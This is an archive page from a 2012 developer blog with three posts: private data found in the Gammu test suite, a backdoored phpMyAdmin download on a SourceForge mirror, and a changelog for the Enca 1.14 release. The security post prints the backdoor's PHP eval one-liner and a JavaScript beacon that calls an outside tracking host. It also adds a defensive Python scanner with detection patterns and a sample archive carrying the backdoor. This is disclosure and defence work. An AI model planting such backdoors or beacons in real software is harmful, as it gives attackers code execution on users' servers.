Michal Čihař - Archive for 9/2012

Think twice before making your private data public

Data, once put on the internet, is quite hard to delete. You can most likely delete it (or ask for it to be deleted) from the place where it was originally distributed, but you can never be sure where else it has appeared.

Recently, I've seen several requests to remove some data from the Gammu test suite. This test suite was created using public data available in our bug tracker, simply to be able to verify that we won't break things which were fixed earlier.

It turns out that some people made public some very private stuff, which ended up included in the test suite. None of the developers had a clue about the content of these messages, which were in a language none of us understands (and we were too lazy to run them through Google Translate to understand them).

Of course we've removed the data on request, but it has probably already been copied to a dozen other places on the internet...

Compromised SourceForge mirror

Yesterday, the phpMyAdmin security team was notified about a backdoor being distributed together with the phpMyAdmin zip file on one of the SourceForge mirrors.

We quickly analyzed the issue and confirmed that the backdoor is indeed present in the phpMyAdmin-3.5.2.2-all-languages.zip file. It allowed anybody to execute arbitrary PHP code: there was a file called server_sync.php which simply called eval on the passed data:

<?php @eval($_POST['c']);?>

In addition to this, JavaScript code was included which could allow the attacker to track vulnerable installations:

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

All in all, it looks like a simple but quite effective way to install a backdoor, if they had been able to spread it more widely. We immediately released PMASA-2012-5 to notify our users.
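As an added defender-side example (not code from this post or from the phpMyAdmin project), the following Python script checks a downloaded release archive for the two artifacts described above: a PHP file that passes request data straight to eval(), and any reference to the tracking domain used by the beacon. It also compares the archive's SHA-256 against a published checksum. The sample archive it builds is constructed for the example, and the expected-checksum placeholder in the usage stands in for the hash a project would publish next to its release.

```python
import hashlib
import hmac
import io
import re
import sys
import zipfile

# Patterns derived from the artifacts quoted in the post: a one-line eval()
# of request data, and the beacon's tracking host. The regexes themselves are
# this example's own, not something shipped by phpMyAdmin.
EVAL_OF_REQUEST = re.compile(
    rb"eval\s*\(\s*(?:\$_POST|\$_GET|\$_REQUEST|\$_COOKIE)\b", re.IGNORECASE
)
TRACKING_HOST = re.compile(rb"phpmyadmin-images\.net", re.IGNORECASE)
# File name the post identifies as the backdoor; a pristine archive has no such file.
KNOWN_BAD_NAMES = {"server_sync.php"}
PHP_SUFFIXES = (".php", ".phtml", ".inc")


def scan_archive(zip_bytes: bytes) -> list[tuple[str, str]]:
    """Return (member_name, reason) for every suspicious member of the zip."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            base = name.rsplit("/", 1)[-1]
            if base in KNOWN_BAD_NAMES:
                findings.append((name, "known backdoor filename"))
            data = zf.read(info)
            # eval() of request input only matters where PHP will execute it
            if base.lower().endswith(PHP_SUFFIXES) and EVAL_OF_REQUEST.search(data):
                findings.append((name, "eval() of request parameter"))
            # the beacon can sit in any file type (JS, HTML, PHP), so scan them all
            if TRACKING_HOST.search(data):
                findings.append((name, "reference to tracking domain"))
    return findings


def archive_sha256(zip_bytes: bytes) -> str:
    """Hex SHA-256 of the whole archive, for comparison with a published checksum."""
    return hashlib.sha256(zip_bytes).hexdigest()


def verify_checksum(zip_bytes: bytes, expected_hex: str) -> bool:
    """True when the archive matches the checksum published by the project."""
    return hmac.compare_digest(archive_sha256(zip_bytes), expected_hex.lower())


def build_sample_archive() -> bytes:
    """Constructed sample: one clean file, the backdoor file from the post,
    and a JS file carrying the beacon. Not a real phpMyAdmin release."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("phpMyAdmin-3.5.2.2/index.php", "<?php echo 'hello'; ?>\n")
        zf.writestr("phpMyAdmin-3.5.2.2/server_sync.php", "<?php @eval($_POST['c']);?>")
        zf.writestr(
            "phpMyAdmin-3.5.2.2/js/common.js",
            'var icon = document.createElement("img");\n'
            'icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";\n',
        )
    return buf.getvalue()


if __name__ == "__main__":
    # usage: scan.py <archive.zip> [<expected-sha256-from-project-site>]
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
    else:
        blob = build_sample_archive()
    if len(sys.argv) > 2:
        print("checksum matches:", verify_checksum(blob, sys.argv[2]))
    for member, reason in scan_archive(blob):
        print(f"SUSPICIOUS {member}: {reason}")
```

The checksum comparison is the stronger control: a content scan only catches patterns someone already knows about, while a mismatch against the hash published on the project's own site flags any tampering on a mirror, whatever form it takes.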

Luckily this was spotted quite fast (judging by the domain used, the exploit could not have been alive before 22nd September 2012) and not on a much-frequented mirror (based on the official SourceForge statement, about 400 users downloaded the file with the backdoor).

What still remains unclear is whether this really targeted only phpMyAdmin, or whether there were more modified files on this mirror (SourceForge hosts thousands of projects). I randomly tried a few of our other download options from this mirror and none of them was affected, but the mirror was taken offline before I could do a more systematic analysis, so this question can now be answered only by SourceForge.

Enca 1.14

It seems I forgot to announce Enca 1.13 here, but I won't make the same mistake with 1.14, which has been released today.

If you don't know Enca, it is an Extremely Naive Charset Analyser. It detects the character set and encoding of text files and can also convert them to other encodings using either a built-in converter or external libraries and tools like libiconv, librecode, or cstocs. Its code is currently available at Gitorious.

The full changelog for the 1.14 release is short:

  • Allow standard names for the Belarusian and Slovenian languages, thanks to Branislav Geržo for the suggestion.
  • Reset strictness when the check buffer is smaller than the file size, thanks to Sam Liao.
  • Fixed typos in the man page, thanks to A. Costa.

Enca is still in maintenance mode only and I have no intention of writing new features. However, there is no such limitation on other contributors :-).

You can download it from http://cihar.com/software/enca/.